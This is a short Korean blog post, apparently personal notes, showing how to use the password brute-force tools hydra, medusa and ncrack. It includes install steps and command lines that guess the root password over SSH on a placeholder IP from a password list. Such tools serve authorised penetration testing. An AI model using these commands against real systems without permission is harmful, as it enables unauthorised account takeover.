기본적으로 brute-force방식으로 패스워드가 될만한 문자열을 대입하여 로그인을 시도한다.
telnet, ftp, ssh, 인터넷 공유기 등의 암호 크랙에 사용된다.
hydra : http://www.thc.org/releases/hydra-7.4.2.tar.gz
medusa : http://www.foofus.net/jmk/tools/medusa-2.1.1.tar.gz
kali에는 다 깔려 있군!
Redgat계열 : yum , Debian 계열 : apt-get , OSX : port 로 설치 가능하다.
hydra의 기본 사용방법
hydra -l root -P password.txt 123.123.123.123 ssh -V -f
-l : 사용자 명
-P : 패스워드 리스트 파일
서버명
서비스형식
-V : 시도하고 있는 id/password 화면에 보이게 하는 옵션
-f : 패스워드 찾았으면 종료
medusa의 기본 사용방법
medusa -h 123.123.123.123 -u root -P password.txt -M ssh
-h : 호스트명
-u : 사용자명
-P : 패스워드 리스트 파일
-M : 사용모듈(medusa -d로 확인 가능) ssh 모듈이 없다면 libssh 설치필요
:ftp 에서는 브로드 포싱중 3번재 이후로는 return 신호가 안온다고 종료 된다 그래서 알아보는 중 ncrack이라는 툴을 알게 되어 아래 간단하게 정리해 보았다.
libssh 설치 방법
port이용시 : sudo port install libssh2
apt-get이용시 : sudo apt-get install libssh-dev
ncrack의 기본 사용 방법
ncrack -u root -P passwordlist.txt -p portnumber 123.123.123.123
-u : 사용자 명 (root)
-P : passwordlist 파일 설정
-p : 포트 번호(port number)
123.123.123.123 : 대상 ip
생활해킹에 전에 password crack 툴에 대한 질문글이 올라와서 나도 한번 사용해 봐야지 해서, 이번기회에 사용해 봤는데, 전부 브로드포싱기술을 사용하는 군.. python으로 한번 코드 짜봐야겠다 ! +_ +a
댓글 없음:
댓글 쓰기